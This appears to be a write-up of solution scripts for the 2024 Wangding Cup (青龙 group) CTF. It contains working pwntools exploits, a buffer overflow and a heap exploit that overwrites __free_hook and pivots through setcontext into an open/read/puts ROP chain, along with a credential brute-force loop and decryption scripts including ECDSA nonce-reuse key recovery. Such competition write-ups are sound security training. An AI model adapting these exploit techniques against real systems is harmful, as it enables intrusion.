网鼎杯2024 - 青龙

PWN02

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from time import time
from struct import pack
from LibcSearcher import *
cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io   = gift['io'] # process或remote对象
elf  = gift["elf"] # ELF对象,ELF("./pwn")
libc = gift.libc # ELF对象, ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug



arch='i386'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    libc = ELF("./libc-2.31.so")
    gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样,打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
# - - - - - - - - - - - - - #
def pwn_exp():
    print("PWN")
    sla("Enter your username: ",'admin')
    sla("Enter your password: ",'admin123')
    ru("You will input this: ")
    ru("0x")
    stack_addr = int(io.recv(8),16)
    p =b'a'*8+p32_ex(0x804A038).ljust(0x48,b'\x00')+p32_ex(stack_addr)+p32_ex(0x080485fa)
    sla("plz input your msg:\n",p)



#log
    
    log.info('#---#---#---#---#')
    log.success('libc.address:'+hex(libc.address))
    log.success('elf.address:'+hex(elf.address))
    #log.success('heap_bae:'+hex(heap_base))


if __name__ == '__main__':
    pwn_exp()
    io.interactive()

PWN04

爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
name = ''
while True :
	for i in range(0x21,0x7f):
		sla("Input your username:",name+chr(i))
		io.recvline()
		c = io.recvline()
		if b'length!' in c:
			name += chr(i)
		if b'correct!' in c:
			name += chr(i)
			exit()


passwd = ''
while True :
	for i in range(0x21,0x7f):
		sla("Input your username:",'4dm1n')
		sla("Input your password:",passwd+chr(i))
		io.recvline()
		c = io.recvline()
		if b'length!' in c:
			passwd += chr(i)
		if b'correct!' in c:
			passwd += chr(i)
			exit()

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from time import time
from struct import pack
from LibcSearcher import *
cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io   = gift['io'] # process或remote对象
elf  = gift["elf"] # ELF对象,ELF("./pwn")
libc = gift.libc # ELF对象, ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

libc = ELF("./libc.so.6")
gift['libc'] = libc

arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    libc = ELF("./libc.so.6")
    gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样,打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
key = 's4cur1ty_p4ssw0rd'
key_len = len(key)
# - - - - - - - - - - - - - #
def encode(key,ptr):
    size = len(ptr)
    data = list(ptr)
    v5 = 0
    v6 = 0
    for i in range(0,size):
        v5 = (v5+1)%256
        v6 = (v6+key[v5])%256
        v4 = key[v5]
        key[v5] = key[v6]
        key[v6] = v4
        data[i] = (data[i]^key[(key[v5]+key[v6])%256])
    return bytes(data)

def cmd(c):
    sla("5. Exit",str(c))
def add(idx,size,data=b'A'):
    cmd(1)
    sla("Input the key: ",str(idx))
    sla("Input the value size: ",str(size))
    sla("Input the value: ",data)
def free(idx):
    cmd(3)
    sla("Input the key: ",str(idx))
def show(idx):
    cmd(2)
    sla("Input the key: ",str(idx))
def edit(idx,data):
    cmd(4)
    sla("Input the key: ",str(idx))
    sla("Input the value: ",data)
def getkey():
    key_ = [0 for i in range(256)]
    v8 = [0 for i in range(256)]
    for i in range(0,256):
        key_[i] = i
        v8[i] = ord(key[i%key_len])
    v7 = 0
    for i in range(0,256):
        v7 = (v8[i]+v7+key_[i])%256
        v4 = key_[i]
        key_[i] = key_[v7]
        key_[v7] = v4
    return key_
# - - - - - - - - - - - - - #
def pwn_exp():
    print("PWN")

    sla("Input your username:",'4dm1n')
    sla("Input your password:",'985da4f8cb37zkj')
    for i in range(9):
        add(i,0x2f0)
    for i in range(7):
        free(i)
    free(7)
    show(6)
    ru("value] = [6,")
    res6 = io.recv(0x20)
    show(7)
    ru("value] = [7,")
    res7 = io.recv(0x20)
    key_ = getkey()
    res6 = encode(key_,res6)
    key_ = getkey()
    res7 = encode(key_,res7)
    leak = u64_ex(res6[:8])
    heap_base = leak - 0x650671ceec70 + 0x650671ced000-0x900
    leak = u64_ex(res7[:8])
    libc.address = leak - 0x799da79ebca0+0x799da7600000
    
    p1 = p64_ex(libc.sym.__free_hook)*2
    key_ = getkey()
    p1 = encode(key_,p1)
    edit(6,p1)
    pay =b''
    pay = pay.ljust(0x78,b'\x00')+p64_ex(heap_base+0x5788be2cf870-0x5788be2cd000+0x00)
    pay = pay.ljust(0xa0,b'\x00')+p64_ex(heap_base+0x5788be2cf870-0x5788be2cd000+0x100)
    pay = pay.ljust(0xa8,b'\x00')+p64_ex(CG.ret())
    pay = pay.ljust(0xb0,b'\x00')+b'flag.txt'
    pay = pay.ljust(0x100,b'\x00')
    pay += p64_ex(CG.ret())*2
    pay += p64_ex(CG.pop_rdi_ret())+p64_ex(heap_base+0x5788be2cf870-0x5788be2cd000+0xb0)+p64_ex(CG.pop_rsi_ret())+p64_ex(0)+p64_ex(CG.pop_rdx_ret())+p64_ex(0)+p64_ex(libc.sym.open)
    pay += p64_ex(CG.pop_rdi_ret())+p64_ex(3) +p64_ex(CG.pop_rsi_ret())+p64_ex(heap_base+0x300)+p64_ex(CG.pop_rdx_ret())+p64_ex(0x100)+p64_ex(libc.sym.read)
    pay += p64_ex(CG.pop_rdi_ret())+p64_ex(heap_base+0x300)+p64_ex(libc.sym.puts)
    add(10,0x2f0,pay)
    CG.set_find_area(find_in_elf=False,find_in_libc=True)
    p = p64_ex(libc.sym.setcontext+53)*2
    key_ = getkey()
    p = encode(key_,p)
    add(11,0x2f0,p)
    log.success('setcontext:'+hex(libc.sym.setcontext+53))
    pause()
    free(10)

#log
    
    log.info('#---#---#---#---#')
    log.success('libc.address:'+hex(libc.address))
    log.success('elf.address:'+hex(elf.address))
    log.success('heap_bae:'+hex(heap_base))


if __name__ == '__main__':
    pwn_exp()
    io.interactive()

RE2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env python
from Crypto.Cipher import AES
import base64

flag = 'wdflag{'

# 第一部分:前8个字符解密
s2 = [112, 0xc2, 108, 0xca, ord('n'), ord('p'), ord('p'), ord('l')]
first_8 = ""
for i in s2:
    first_8 += chr(i//2)
flag += first_8
print("第一部分:", first_8)

# 第二部分:XorrLord异或解密
v22 = 'XorrLord'
v11 = [ord('9'), ord('['), 23, 16, 127, 13, 71, 6]
second_8 = ""
for i in range(8):
    second_8 += chr(ord(v22[i]) ^ v11[i])
flag += second_8
print("第二部分:", second_8)

# 第三部分:base64换表解密
str = 'PVLlQVPhPFW'
s_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c_str = 'CDEFGHIJKLMNOPQRSTUVWXYZABabcdefghijklmnopqrstuvwxyz0123456789+/'

code_table = str.maketrans(c_str, s_str)
ss = str.translate(code_table)
while len(ss) % 4 != 0:
    ss += '='
decoded = base64.b64decode(ss)
flag += decoded.decode()
print("第三部分:", decoded.decode())

# 第四部分:AES解密
key = b"AesMasterAesMast"
ciphertext = bytes([
    0xA7, 0x20, 0x15, 0xFF, 0xCD, 0xF4, 0x50, 0xDE,
    0x78, 0xBE, 0xA7, 0x94, 0x7F, 0xBF, 0xAC, 0xC5
])

cipher = AES.new(key, AES.MODE_ECB)
plaintext = cipher.decrypt(ciphertext)
# 前8位转换为字符
aes_result = ''.join(chr(x) for x in plaintext[:8])
flag += aes_result
print("AES解密(前8位转chr):", aes_result)

# 添加结尾的大括号
flag += '}'

print("\n最终flag:", flag)
print("flag长度:", len(flag))

CRYPTO02

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import gmpy2
import binascii
from hashlib import sha256
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Util.number import long_to_bytes

def recover_private_key(r, s1, s2, z1, z2, n):
    k = ((z1 - z2) * gmpy2.invert(s1 - s2, n)) % n
    dA = ((s1 * k - z1) * gmpy2.invert(r, n)) % n
    return dA

def victory_decrypt(ciphertext, key):
    key = key.lower()  # 转换为小写
    key_length = len(key)
    plaintext = ''
    ciphertext = ciphertext.lower()  # 转换为小写
    
    for i, char in enumerate(ciphertext):
        if char.isalpha():
            shift = ord(key[i % key_length]) - ord('a')
            decrypted_char = chr((ord(char) - ord('a') - shift) % 26 + ord('a'))
            plaintext += decrypted_char
        else:
            plaintext += char
            
    return plaintext

# 恢复私钥
r = 111817653331957669294460466848850458804857945556928458406600106150268654577388
s1 = 86614391420642776223990568523561232627667766343605236785504627521619587526774
s2 = 99777373725561160499828739472284705447694429465579067222876023876942075279416
z1 = 96525870193778873849147733081234547336150390817999790407096946391065286856874
z2 = 80138688082399628724400273131729065525373481983222188646486307533062536927379
n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

dA = recover_private_key(r, s1, s2, z1, z2, n)

# 解密AES
key = sha256(long_to_bytes(dA)).digest()
encrypted_data = binascii.unhexlify('6c201c3c4e8b0a2cdd0eca11e7101d45d7b33147d27ad1b9d57e3d1e20c7b3c2e36b8da3142dfd5abe335a604ce7018878b9f157099211a7bbda56ef5285ec0b')
iv = encrypted_data[:16]
ciphertext = encrypted_data[16:]

cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)

# 解密维吉尼亚密码
victory_key = "wangdingcup"  # 使用小写密钥
flag = victory_decrypt(decrypted.decode(), victory_key)
print("flag:", flag)